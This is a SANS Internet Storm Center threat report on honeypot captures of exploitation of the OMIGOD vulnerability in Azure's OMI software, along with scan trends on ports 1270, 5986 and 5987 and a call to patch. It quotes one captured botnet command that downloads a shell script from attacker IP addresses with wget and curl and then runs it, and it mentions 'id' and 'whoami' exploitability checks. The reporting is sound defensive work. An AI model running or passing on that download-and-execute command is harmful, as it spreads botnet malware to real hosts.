#OMIGOD Exploits Captured in the Wild. Researchers responsible for half of scans for related ports.
Last Updated: 2021-09-20 14:07:33 UTC
by Johannes Ullrich (Version: 1)
After the "OMIGOD" vulnerability details were made public, and it became obvious that exploiting vulnerable hosts would be trivial, researchers and attackers started pretty much immediately to scan for vulnerable hosts. We saw a quick rise of scans, particularly against port 1270. 
Some of the attacks originated from research projects that apparently enumerated vulnerable hosts. Scans we have linked to researchers appear so far to scan for the open port and do not send any specific attack payload. But we also see "genuine" exploits of the vulnerability. Azure is probably the most target-rich environment, with more than half of all hosts running Linux. Many of them have the Open Management Interface (OMI) software pre-installed by default. Azure is also leaving it up to the users to patch this software that they may not know is installed. Our data comes from our honeypot network, which is not specifically covering Azure so far. The OMI software may also be installed outside of Azure. It makes sense for attackers to scan the entire internet as hosts outside of Azure may not consider themselves vulnerable.
One exploit that just hit our honeypot (formatted for easier readability)
At this point, all of the exploits we have seen appear to test the vulnerability and do not (yet?) deploy any actual payloads. Others have observed some "Mirai" style payloads being deployed.
Here are the most common commands we see executed (sometimes, the command is Base64 encoded):
wget -O lolol.sh http://18.104.22.168/lolol.sh; curl -o lolol.sh http://22.214.171.124/lolol.sh; chmod 777 lolol.sh; sh lolol.sh
This is a typical botnet propagation command. At the time I looked for it, the lolol.sh script was no longer available, and the URL returned a 404 error.
I have seen the same command against the other ports associated with "OMI," using different 'test' URLs. The URL is not reachable. Note how the IP is the same as above.
In addition, I have seen some simple requests using "id" or "whoami," typical checks if the vulnerability is exploitable.
Interestingly, I have seen only one IP in our honeypots for the 'wget' or 'curl' commands, but the requests originated from 125 different source IPs just today alone. This appears to be one botnet, and I guess that right now, they are just looking for vulnerable systems (hitting the above URL would prove you to be vulnerable).
As far as scans against related ports (port 1270, port 5986, port 5987), below is a graph of the targets seeing scans on these ports:
It is interesting how the scans slowly increased in September before the vulnerability was announced, and something that needs a bit more time to look into.
Almost exactly half of the scans to these ports come from researchers. The "Strechoid" network appears to be most active, but others like Shodan, Internet Census, Onyphe, Cyber.casa, Internettl and so on are participating. Not all of these are typically publishing results, but for those that do expect a lot of identical papers/news releases soon with headlines like "1000's of exposed hosts found vulnerable to OMIGOD" (if they didn't find much) or "10s of 1000s of exposed hosts found vulnerable to OMIGOD" (if they found more).
So far, there is a lot of recon happening. But this is a MUST PATCH NOW vulnerability, and if you are finding an exposed host inside Azure running OMI, assume compromise.
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu